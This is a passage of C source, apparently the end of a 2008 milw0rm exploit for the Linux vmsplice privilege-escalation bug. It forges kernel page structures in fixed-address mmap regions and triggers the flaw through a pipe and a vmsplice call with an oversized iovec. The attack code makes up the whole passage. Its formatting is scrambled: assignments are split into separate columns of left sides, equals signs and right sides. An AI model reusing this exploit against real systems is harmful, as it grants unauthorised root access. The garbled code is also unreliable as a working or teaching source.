printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);
pages[0]->flags
pages[0]->private
pages[0]->count
pages[1]->lru.next

=
=
=
=

1 << PG_compound;
(unsigned long) pages[0];
1;
(long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);
pages[2]->flags
pages[2]->private
pages[2]->count
pages[3]->lru.next

=
=
=
=

1 << PG_compound;
(unsigned long) pages[2];
1;
(long) kernel_code;

/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);
/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);
/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);
iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;
signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}
// milw0rm.com [2008-02-09]

You might also like